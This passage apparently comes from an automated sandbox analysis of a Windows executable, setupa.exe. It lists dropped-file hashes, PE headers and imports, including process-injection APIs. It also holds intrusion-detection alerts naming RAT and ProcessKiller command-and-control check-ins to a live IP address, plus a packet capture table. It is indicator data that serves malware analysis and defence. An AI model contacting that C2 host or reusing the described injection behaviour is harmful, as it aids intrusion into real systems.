                                                                                                            MD5:83264C210CED1111DD5AEEE689F3050B
                                                                                                            SHA1:C23F9793B18536B17050CBC1BF668FD4C1ABBAB9
                                                                                                            SHA-256:D9B8873E268AF47784363297390AF0F050E9F02A8ED6E16B7EAE69FEB7F924FC
                                                                                                            SHA-512:4C2E3ECB61E12E4B0948A4598553C947BC6316FF5B048EAB5C751B17EDEFCD091E4E67D5E805FF7EE800BBD1F01B234F8264D58FA3044B1E140B283DFCFA5F6A
                                                                                                            Malicious:false
                                                                                                            Preview:5bx.p.L...~.T..P.6.+_..
                                                                                                            Process:C:\Windows\System32\lsass.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):468
                                                                                                            Entropy (8bit):6.161627650457805
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:BI3sGPE9/Je2bhyG+fdEP9BQ12OHhhg27XOD/WcVYPkZ:B2F8dbhyG+K1/Yhhg27XOjWcVYPi
                                                                                                            MD5:24A5827F6F80E0783584F71B965F20A3
                                                                                                            SHA1:978DA6F765A614F4B2E43BDEC46EF499F117663D
                                                                                                            SHA-256:BFB09A4EDB88EFBD70BFEAFA38BCCE8F4ABC89CA89D9013F7597CCE299A2A1D8
                                                                                                            SHA-512:DED0577825C6F3ED9D51861BC8DB6D861C6B3730B7D374E5086EFF7EF807FE6F0D50C35A720462C8ACEF000EE3D1D01EC78DEC94640AD57F1DEDCED107189A7F
                                                                                                            Malicious:false
                                                                                                            Preview:............c.2.7.8.6.2.3.5.-.7.0.a.b.-.4.c.d.c.-.b.5.8.e.-.9.9.7.e.c.a.5.4.c.0.0.8..................................................j.e...6%R.....=@........f...Q.,......AK....8N.......<.J+.f.A....b.......o(EN4..C..J,....[....|.|...x...xU.M-.u....{...`5b0.fB..r..."...M1......S..........Zf[`..q.0.........o.'I.....@........f....[.D....&b.m..x.(.#..i...`+....?.. 7W.f...]..f..]?9=.......%.-..dx...,.='0.B$....._.D.PK}......i9>8(..0...c.....................
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):338
                                                                                                            Entropy (8bit):3.951769064964733
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:kKi39PUxpbHL2iJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:c8DqkPlE99SCQl2DUevat
                                                                                                            MD5:3BAD55DB5AD957F28A62DCAB4B204ACD
                                                                                                            SHA1:8C932D7473520E9C5D5BBB21A0623C5A490C822D
                                                                                                            SHA-256:CD917849BEA9926181FF61BA716A0DEF496BA4546AAAB68AC47C1D6280FC2EA9
                                                                                                            SHA-512:A07A060BCA42D0F88A2008D85B5AB0F51EEA50EDB9C79FA2B0FFC6ECAD5B019840C0CF1CE20A4A1685BB37C8D27AEC869A7DDB624546B36374A8503684ABFFFE
                                                                                                            Malicious:false
                                                                                                            Preview:p...... ........+.].....(...............*...r...*EJ.....*u.4............*EJ..... .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):290
                                                                                                            Entropy (8bit):3.535875048555849
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:kKlvaNrzu6rAzMaN+SkQlPlEGYRMY9z+4KlDA3RUe/:9vOzu6YYkPlE99SNxAhUe/
                                                                                                            MD5:57B9339B1FC13FDA133814AAB7A67432
                                                                                                            SHA1:AEC2FAA3D0FDC00032E2535088E825E8507E0EEA
                                                                                                            SHA-256:DC3D44BC6D9FEE1FA6702F470A65F6059C80CF4F064FDA6B2AFE1E5659761414
                                                                                                            SHA-512:93FD7DF685BCD3CBF1360F9A5C8EC9071BAC6D6521971A06B6A815167728585C08920831A759749843F3AE594707FB28121B91C75004E02D1A981568BD588FA4
                                                                                                            Malicious:false
                                                                                                            Preview:p...... ..........C.....(................D.%s.....M.....................M.... ...................................h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):412
                                                                                                            Entropy (8bit):3.9782949504254868
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:kKt5O8sYe8kt2alXlRNfOAUMivhClroFFKIhipStaHAaloq09Sls8hW0XSW83n:G1zmxMiv8sFFKbpgal7BlvTCN3
                                                                                                            MD5:427724F33D4B477980810DE0332E089B
                                                                                                            SHA1:EE5DF5B6A08AD863DD3F76601017FDE466CA54BC
                                                                                                            SHA-256:0C4F58A824257F47FBB2926AA923D3AD38522B25F9E24B51D84E82140F030406
                                                                                                            SHA-512:EDF1A09A6A7347F32DE36BD0F7ECC687BF55B5F59EA0A73749DE811B21F627E3CFDE3EF7C0C99611EBEFFB124804D35CAFE333366EB7198BBF47933BABF937CC
                                                                                                            Malicious:false
                                                                                                            Preview:p...... ....(.......s...(.......2...........,............................... ..........O.... ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.5.0.o.t.x.%.2.F.h.0.Z.t.l.%.2.B.z.8.S.i.P.I.7.w.E.W.V.x.D.l.Q.Q.U.T.i.J.U.I.B.i.V.5.u.N.u.5.g.%.2.F.6.%.2.B.r.k.S.7.Q.Y.X.j.z.k.C.E.A.q.v.p.s.X.K.Y.8.R.R.Q.e.o.7.4.f.f.H.U.x.c.%.3.D...
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):412
                                                                                                            Entropy (8bit):3.9331883429620835
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:kKt2ElvXJty4/lXlRNfOAUMivhClroFFKIhipStaHAaloq09SlsbhQ6Shlrn:sMjy4/zmxMiv8sFFKbpgal7BlwhZg
                                                                                                            MD5:D3390CBABB4AC7EE2D5532ED848E5CED
                                                                                                            SHA1:501108FE196A36818E52F96AFF6E84A6F1407ABA
                                                                                                            SHA-256:18B3A69329B3B32B9B9ED2FDB826BD94563407E5D5EC879AC4FD0A1F498092D8
                                                                                                            SHA-512:E8DA73858FFAC5D1591E03A6B707D5F574968C49608305BCE59CE9A820F288E47B54B384963F3C3F8D403814299E04A3C3FC6CFA40086F2561ED850C1CA1475D
                                                                                                            Malicious:false
                                                                                                            Preview:p...... ....(.......s...(.......2..........+......b..'....................b..'.. ............... ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.5.0.o.t.x.%.2.F.h.0.Z.t.l.%.2.B.z.8.S.i.P.I.7.w.E.W.V.x.D.l.Q.Q.U.T.i.J.U.I.B.i.V.5.u.N.u.5.g.%.2.F.6.%.2.B.r.k.S.7.Q.Y.X.j.z.k.C.E.A.p.D.q.V.C.b.A.T.U.v.i.Z.V.5.7.H.I.I.u.l.A.%.3.D...
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:modified
                                                                                                            Size (bytes):330
                                                                                                            Entropy (8bit):3.8721745073549534
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:kKlkOf+k0zK/Lc8uScN+SkQlPlEGYRMY9z+4D1QuflIeyGIla1:2O0zCkPlE99Si1QyIeek
                                                                                                            MD5:8E827A7485B8CB4326CEF4E9CE9B48FC
                                                                                                            SHA1:6B9EB00BF1F44F1CB2443AF75213CBD2C9CDA313
                                                                                                            SHA-256:B95693875CA386048ADCEAC3B6E784A37BED17C3D5A52EB3190C7784AA46F91C
                                                                                                            SHA-512:7CC0188F389D8E8DF39EC18C763CA5514C89E0754C4D18FC9CE9C191B998B707E405092A150005B77874040F4A0865454629B3A25F3CEADC7F0ABFC816B91146
                                                                                                            Malicious:false
                                                                                                            Preview:p...... .........QP7s...(................QP7s.....S......................S.... ........B@!........(...........t...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.p.i.n.r.u.l.e.s.s.t.l...c.a.b...".8.0.4.2.4.0.2.1.c.7.d.b.d.2.1.:.0."...
                                                                                                            Process:C:\Windows\System32\lsass.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):11136
                                                                                                            Entropy (8bit):7.976582322275708
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:7XjOa+ejjcSLq7q0h8wjsk+F7bZeOcpFs510szNYaEQfKHBPxPoZm0i7U0g:7TOaz3q7q8eNF7bZZNn+HV9Qm8D
                                                                                                            MD5:C4C123D56B00D3D0D8EB0FF41AEE2AA6
                                                                                                            SHA1:0CACF253851ADFCB7A878D44BF501E736F3C1B5A
                                                                                                            SHA-256:FC274740733B4A6DE8ADE2E6366DC7FFBCC078F3B4450140C2D17DFA6AEADB2A
                                                                                                            SHA-512:543DE7193EEC3D0E0DC11FAF5369DF80F35A0D16A831C8E7D2C53377CF4B2EE417526E21C5EB6C17EED86D299D7919B58E11BCA4B37C9ED51421180C26000852
                                                                                                            Malicious:false
                                                                                                            Preview:....t+..................z..O......5bx.p.L...~.T..... 0...L.o.c.a.l. .C.r.e.d.e.n.t.i.a.l. .D.a.t.a........f...... ......#.qF....2.d...c4....[.6."6F............ ...x.A....2...+..nm3A.....za..]..p*.........?.m.1.....k{...;...d.l-.Q....*..nu`. ...N........z.U>.`...l.M..S~..G]z.h......9.....E...........E;m.......~.,.#.+\...xg!3<.{.9...5}.....0e...l$o....}..S.*..`[.n..~H.8...q...^.^.#.~?~.\G.U...N7..*...J)A.u...\.=.3."..Z..L...:.B.H"'.Bif....*..4.,.....7..&.m........@..I..Q?..y.f...g.T#.L~...?@..&5.._.;3E...J..(..E.....j0......{3&..;Q...^+J.1..:C..EP....4.T. .f.|O.I......%...j....C.k.cI1XP4O..J.:..og>.....k.g8Y6.q2h\f....V.X.A....7-V...X.... w......~)(.Xy:."......_.J..l..k.~..Z.;:.....}=%..N....?.O...&.(B...qs,......|..ju..}.m[...-.U..........x...6...!....{..E.Pr.d..E|.x.~....)....J ?..+o..{.Q..N.......N.`j..^..Ltk.......-....._P.2.P2.7..,.4...Hh.m3....q.W.0.2....TE.0.I..8..Xl..o....Iu...1+..Cr ].8..T.....B....t......=.........u...#..&x.L.W..y.#.
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1835008
                                                                                                            Entropy (8bit):4.418970710247531
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:cSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNd0uhiTw:HvloTMW+EZMM6DFyn03w
                                                                                                            MD5:8C923A0FB4555EF288E70A3271C12712
                                                                                                            SHA1:64AB8BCF295917985485475E64A5E153AC82C2DC
                                                                                                            SHA-256:8B787B669708A28FD6DBE1692E539D134B59EBE0636C8857A9A46EA81C1E642F
                                                                                                            SHA-512:FEB2A07680A2A8470AE2F0E88C1FCBE31E4B8507E47DC4E6CBEBD0951E6A292E9EE76874C2C220FCC96712B672A57200C61E845F2014737204075D0940D233A7
                                                                                                            Malicious:false
                                                                                                            Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.?..r...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                            Entropy (8bit):5.990412037287782
                                                                                                            TrID:
                                                                                                            • Win64 Executable GUI (202006/5) 92.65%
                                                                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                            • DOS Executable Generic (2002/1) 0.92%
                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                            File name:setupa.exe
                                                                                                            File size:1'695'232 bytes
                                                                                                            MD5:60caff11e037bac89bdb4dd789d65fd7
                                                                                                            SHA1:2cd1508b227be4d1dbcde6a5bbe06209d52450ec
                                                                                                            SHA256:0b9fc8ca80e9d9571057feb6302b07eb48aa7d5e587a16b13bec21a05e44696f
                                                                                                            SHA512:3ab366c7557254c6ce4d3f66e9d22acd198dc0d4fa2ee0f065cbd0f02157733687e8eb59ecc1c08a0429968e151826a19563a9c75dd3d1e01414a0d5368133ce
                                                                                                            SSDEEP:24576:tLlotpgGeugfw9PD/CHCeI+mXm3TCyGKOlKeql7a7BbExGSW9X:tLSpgGCo9PbsWlKeqUBOBk
                                                                                                            TLSH:9E758E5A374496C1C2B7813EEAE25B4ED6A434018B61D7DF58A8C79E1F23AD80D3F721
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........2...\[..\[..\[.U.[..\[.U.[".\[.U.[..\[I._Z..\[q6.[..\[..][..\[I.YZ..\[I.XZ..\[^.YZ..\[^..[..\[...[..\[^.^Z..\[Rich..\[.......
                                                                                                            Icon Hash:00928e8e8686b000
                                                                                                            Entrypoint:0x1400063de
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x140000000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x5BB951C4 [Sun Oct 7 00:22:28 2018 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:6
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:6
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:6
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:60c29805358fbbce215652e2447e4d37
                                                                                                            Instruction
                                                                                                            Programming Language:
                                                                                                            • [C++] VS2015 build 23026
                                                                                                            • [RES] VS2015 build 23026
                                                                                                            • [LNK] VS2015 build 23026
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x1687c0         0x64          .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x16c000         0x37563       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x159000         0xd0ec        .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x1a4000         0x19d0        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x129660         0x28          .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x128d70         0x94          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x168000         0x7c0         .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x10a200 | 0x10a200 | 263f51c964f439868f13087243f21e09 | False | 0.34826539748708313 | data | 5.741784022015556 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x10c000 | 0x432b4 | 0x43400 | 4d292c70fba5070f4b1c2eee9b15f1d8 | False | 0.2558448536245353 | data | 4.048695729693801 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x150000 | 0x8408 | 0x5200 | 4ded14349dcb6401ed2be80c806734f6 | False | 0.13805259146341464 | DIY-Thermocam raw data (Lepton 2.x), scale 22678-4416, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 0.836933 | 3.746516705094803 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x159000 | 0xe6f4 | 0xe800 | c6e879dce92d2c12b88d5903458b2627 | False | 0.49289466594827586 | data | 5.768572247241077 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata | 0x168000 | 0x1fde | 0x2000 | 314578b046f2ce7b0ec0ce38b787563f | False | 0.2691650390625 | dBase III DBT, version number 0, next free block index 1482080, 1st item "" | 4.0663092427575425 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls | 0x16a000 | 0x309 | 0x400 | c573bd7cea296a9c5d230ca6b5aee1a6 | False | 0.021484375 | data | 0.011173818721219527 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.00cfg | 0x16b000 | 0x11b | 0x200 | 40aa4324c85f833c79a3a29ca3da2ecc | False | 0.044921875 | data | 0.15517757530476972 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x16c000 | 0x37563 | 0x37600 | f63b6fefda5ceff73447e2cd00291493 | False | 0.4044115053611738 | data | 5.527377392585506 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1a4000 | 0x2dbc | 0x2e00 | 9d59bf2addd7ec11f28c7af906600bf6 | False | 0.22197690217391305 | data | 3.9125209396225573 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_RCDATA | 0x16c1c0 | 0x2dd58 | ASCII text, with very long lines (65536), with no line terminators | Chinese | China | 0.48510141901393444
RT_MANIFEST | 0x199f18 | 0x22f | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (499), with CRLF line terminators | English | United States | 0.5295169946332737
DLL | Import
ntdll.dll | RtlPcToFileHeader, RtlUnwindEx, RtlCaptureStackBackTrace, NtSetInformationWorkerFactory, NtQueryInformationWorkerFactory, TpAllocJobNotification, TpAllocAlpcCompletion, NtSetTimer2, ZwSetIoCompletion, RtlAdjustPrivilege, NtAlpcConnectPort, NtAlpcSetInformation, NtAlpcCreatePort, ZwSetInformationFile, ZwAssociateWaitCompletionPacket, NtQueryObject, NtQueryInformationProcess, RtlNtStatusToDosError
WINHTTP.dll | WinHttpCrackUrl
KERNEL32.dll | WriteConsoleW, HeapSize, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, SetStdHandle, FindNextFileW, FindNextFileA, FindFirstFileExW, FindFirstFileExA, FindClose, OutputDebugStringA, GetCommandLineW, GetCommandLineA, SetEnvironmentVariableW, GetCurrentProcess, GetLastError, LocalFree, FormatMessageA, SearchPathA, CreateFileA, WriteFile, IsDebuggerPresent, CloseHandle, FreeLibrary, GetModuleHandleA, GetProcAddress, LoadResource, LockResource, SizeofResource, LoadLibraryA, LoadLibraryW, FindResourceA, CreateToolhelp32Snapshot, Process32First, Process32Next, CreateThreadpoolWork, CreateThreadpoolTimer, CreateThreadpoolWait, CreateThreadpoolIo, CreateFileW, DuplicateHandle, SetEvent, CreateEventW, OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateJobObjectW, AssignProcessToJobObject, SetInformationJobObject, WideCharToMultiByte, FormatMessageW, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObjectEx, Sleep, GetCurrentThread, GetCurrentThreadId, GetExitCodeThread, GetNativeSystemInfo, MultiByteToWideChar, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, GetModuleHandleW, TryEnterCriticalSection, CompareStringW, LCMapStringW, GetLocaleInfoW, GetStringTypeW, GetCPInfo, ResetEvent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetCurrentProcessId, InitializeSListHead, TerminateProcess, CreateTimerQueue, SignalObjectAndWait, SwitchToThread, CreateThread, SetThreadPriority, GetThreadPriority, GetLogicalProcessorInformation, CreateTimerQueueTimer, ChangeTimerQueueTimer, DeleteTimerQueueTimer, GetNumaHighestNodeNumber, GetProcessAffinityMask, SetThreadAffinityMask, RegisterWaitForSingleObject, UnregisterWait, OutputDebugStringW, GetThreadTimes, FreeLibraryAndExitThread, GetModuleFileNameW, LoadLibraryExW, GetVersionExW, VirtualAlloc, VirtualFree, VirtualProtect, SetProcessAffinityMask, ReleaseSemaphore, InterlockedPopEntrySList, InterlockedPushEntrySList, InterlockedFlushSList, QueryDepthSList, UnregisterWaitEx, WaitForMultipleObjectsEx, WaitForSingleObject, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, RaiseException, ExitProcess, GetModuleHandleExW, HeapAlloc, ExitThread, ResumeThread, HeapReAlloc, HeapFree, GetStdHandle, GetModuleFileNameA, GetACP, GetFileType, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetTimeZoneInformation, GetProcessHeap, SetConsoleCtrlHandler, IsValidCodePage, GetOEMCP
ADVAPI32.dll | SystemFunction036
Language of compilation system | Country where language is spoken | Map
Chinese | China |
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-07T06:39:08.962828+0200 | 2052262 | ET MALWARE Win32/ProcessKiller CnC Initialization M1 | 1 | 192.168.2.5 | 49707 | 47.239.116.158 | 6666 | TCP
2024-10-07T06:39:13.355916+0200 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.5 | 49709 | 47.239.116.158 | 6666 | TCP
2024-10-07T06:39:17.979812+0200 | 2052262 | ET MALWARE Win32/ProcessKiller CnC Initialization M1 | 1 | 192.168.2.5 | 49739 | 47.239.116.158 | 6666 | TCP
2024-10-07T06:40:14.725647+0200 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.5 | 49728 | 47.239.116.158 | 6666 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 7, 2024 06:39:01.821239948 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:01.821341991 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:01.821453094 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:01.824052095 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:01.824095964 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.090195894 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.090398073 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.091135979 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.091202974 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.148869991 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.148947954 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.150032997 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.189912081 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.236857891 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.283406973 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.609041929 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.609098911 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.609117985 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.609155893 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.609174013 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.609224081 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.609249115 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.609281063 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.609282017 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.609306097 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.690504074 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.690562010 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.690603971 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.690629959 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.690658092 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.690677881 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.693627119 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.693671942 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.693702936 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.693716049 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.693743944 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.693769932 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.776736975 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.776837111 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.776875019 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.776894093 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.776926041 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.776949883 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.777343988 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.777384996 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.777415991 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.777426958 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.777456999 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.777473927 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.778446913 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.778485060 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.778517008 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.778527021 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.778553963 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.778568029 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.780142069 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.780184984 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
